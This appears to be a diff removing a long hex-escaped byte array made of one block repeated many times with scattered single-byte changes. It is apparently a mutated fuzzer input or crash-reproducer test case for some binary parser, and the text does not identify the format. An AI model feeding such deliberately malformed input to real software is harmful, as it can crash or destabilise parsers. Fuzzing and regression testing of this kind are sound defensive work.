-"\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05" -"\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05" -"\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05" -"\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2" -"\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04" -"\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46" -"\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6" -"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6" -"\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6" -"\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6" -"\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00" -"\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96" -"\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03" -"\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08" -"\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07" -"\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76" -"\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06" -"\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00" -"\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00" -"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00" -"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00" -"\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00" -"\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2" -"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d" -"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d" -"\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a" 
-"\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00" -"\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01" -"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03" -"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05" -"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53" -"\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03" -"\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a" -"\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01" -"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01" -"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01" -"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18" -"\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01" -"\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03" -"\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05" -"\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06" -"\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66" -"\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6" -"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\xd5\x02\x03\xc2\x05\x35\xd6" -"\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6" -"\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76" -"\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08" -"\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06" -"\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35" -"\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35" -"\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35" 
-"\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00" -"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24" -"\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68" -"\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2" -"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d" -"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d" -"\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02" -"\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23" -"\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03" -"\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03" -"\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03" -"\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05" -"\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24" -"\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76" -"\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01" -"\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03" -"\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05" -"\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05" -"\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05" -"\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00" -"\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04" -"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04" -"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04" -"\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05" -"\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05" 
-"\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05" -"\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06" -"\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1" -"\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00" -"\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35" -"\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35" -"\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35" -"\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01" -"\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23" -"\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02" -"\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00" -"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00" -"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00" -"\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00" -"\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05" -"\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06" -"\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06" -"\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03" -"\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03" -"\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03" -"\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03" -"\x6b\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03" -"\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04" -"\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56" -"\x93\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00" -"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00" -"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00" -"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6" 
-"\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02" -"\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04" -"\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06" -"\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00" -"\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01" -"\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05" -"\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05" -"\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05" -"\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00" -"\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23" -"\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d" -"\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff" -"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00" -"\x00\x18\xf6\x03\x00\x00\x35\xd6\xbd\x00\x01\x03\x53\x03\x35\xd6" -"\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6" -"\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6" -"\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34" -"\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01" -"\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01" -"\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05" -"\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06" -"\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06" -"\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03" -"\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76" -"\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00" -"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00" -"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00" 
-"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14" -"\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53" -"\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc" -"\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f" -"\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00" -"\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01" -"\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00" -"\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02" -"\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04" -"\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06" -"\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23" -"\x76\x02\x03\xdc\x08\x23\x76\x03\x1a\x5d\x06\x23\x76\x04\x05\x4f" -"\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13" -"\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01" -"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01" -"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01" -"\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00" -"\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02" -"\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04" -"\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00" -"\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00" -"\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00" -"\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6" -"\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6" -"\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6" -"\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02" -"\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76" -"\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96" -"\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" 
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35" -"\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35" -"\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35" -"\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34" -"\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01" -"\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53" -"\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc" -"\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f" -"\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x33\x76\x00\x01\x53\x03\x23" -"\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d" -"\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b" -"\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00" -"\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03" -"\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03" -"\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03" -"\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03" -"\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01" -"\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00" -"\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00" -"\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02" -"\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04" -"\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01" -"\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76" -"\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06" 
-"\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04" -"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04" -"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04" -"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00" -"\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05" -"\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05" -"\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05" -"\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6" -"\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49" -"\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35" -"\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35" -"\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35" -"\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23" -"\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc" -"\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05" -"\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00" -"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00" -"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00" -"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6" -"\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03" -"\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08" -"\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07" -"\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00" -"\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17" -"\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06" -"\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03" -"\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03" -"\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03" -"\x5d\x06\x23\x76\x00\xca\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76" 
-"\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07" -"\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6" -"\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00" -"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00" -"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00" -"\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01" -"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03" -"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05" -"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01" -"\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16" -"\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21" -"\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05" -"\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05" -"\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05" -"\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2" -"\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04" -"\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46" -"\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff" -"\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6" -"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6" -"\x05\x02\x03\xce\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6" -"\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6" -"\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00" -"\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96" -"\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03" -"\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08" -"\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07" 
-"\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76" -"\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06" -"\x23\x76\x04\x05\x4f\x07\x6b\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00" -"\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00" -"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00" -"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00" -"\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00" -"\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2" -"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d" -"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d" -"\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a" -"\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00" -"\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01" -"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03" -"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05" -"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53" -"\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03" -"\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a" -"\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01" 